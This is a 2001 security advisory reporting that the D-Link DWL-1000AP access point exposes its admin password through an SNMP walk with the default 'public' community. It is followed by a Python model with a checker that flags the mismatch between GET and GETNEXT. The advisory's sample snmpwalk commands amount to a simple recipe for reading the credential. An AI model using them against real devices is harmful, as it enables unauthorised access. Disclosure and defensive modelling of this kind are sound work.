
D-Link public snmp reveals admin password
24th Dec 2001 [SBWID-4955]


	D-Link DWL-1000AP


	Jonathan Strine reported :

	Admin password is readable via SNMP "public" community in OID as a string value

	 Update (25 January 2002)



	Sample exploit :

	The bug in the access point only reveals the password if you call for it by doing an SNMP walk, which uses a next request to get the OID instead of calling it explicitly. I tried:


	#snmpget public enterprises.937.

	enterprises.937. = ""


	#snmpwalk public enterprises.937.

	enterprises.937. = ""


	Both explicit calls to the oid fail but if I use next to call that oid I get


	#snmpwalk public enterprises.937.

	enterprises.937. = "mypw"



	Vendor sees no problem
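
The GET versus GETNEXT difference reported above, modelled as an added example (not code from the advisory, its reporter or D-Link): a toy agent that filters a hidden object on GET but not on GETNEXT, with a consistency check that flags any OID whose walked value differs from its explicit GET value. The OIDs, the values and the assumed cause (an access check present in only one handler) are constructed; the advisory truncates the real OID.

```python
from bisect import bisect_right

# Constructed sample MIB. OIDs are tuples; SECRET_OID is a hypothetical
# placeholder under enterprises.937 (the advisory truncates the real OID).
SECRET_OID = (1, 3, 6, 1, 4, 1, 937, 99, 1)
MIB = {
    (1, 3, 6, 1, 2, 1, 1, 5, 0): "ap-lobby",        # sysName (constructed value)
    (1, 3, 6, 1, 4, 1, 937, 99, 0): "DWL-1000AP",   # constructed
    SECRET_OID: "mypw",                              # constructed admin password
}

class Agent:
    """Toy SNMP agent; filter_getnext=False models the reported behaviour."""
    def __init__(self, mib, hidden, filter_getnext):
        self.mib, self.hidden = mib, hidden
        self.filter_getnext = filter_getnext
        self.oids = sorted(mib)          # tuple order == SNMP lexicographic order

    def _view(self, oid):
        # Single access check: hidden objects read back as an empty string.
        return "" if oid in self.hidden else self.mib[oid]

    def get(self, oid):
        return self._view(oid) if oid in self.mib else None

    def getnext(self, oid):
        i = bisect_right(self.oids, oid)  # first OID strictly after `oid`
        if i == len(self.oids):
            return None                   # end of MIB view
        nxt = self.oids[i]
        # Assumed cause: the GETNEXT path skips the check that GET applies.
        return nxt, (self._view(nxt) if self.filter_getnext else self.mib[nxt])

def walk(agent, root=()):
    """Repeat GETNEXT from root, as snmpwalk does, while still under root."""
    out, cur = [], root
    while (step := agent.getnext(cur)) and step[0][:len(root)] == root:
        out.append(step)
        cur = step[0]
    return out

def inconsistent_oids(agent):
    """OIDs whose walked value differs from the value an explicit GET returns."""
    return [oid for oid, val in walk(agent) if agent.get(oid) != val]

VULNERABLE = Agent(MIB, {SECRET_OID}, filter_getnext=False)
FIXED = Agent(MIB, {SECRET_OID}, filter_getnext=True)

if __name__ == "__main__":
    print("vulnerable:", inconsistent_oids(VULNERABLE))
    print("fixed:     ", inconsistent_oids(FIXED))
```

Routing both handlers through the same `_view` check is what makes the walk and the explicit GET agree in the fixed agent.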
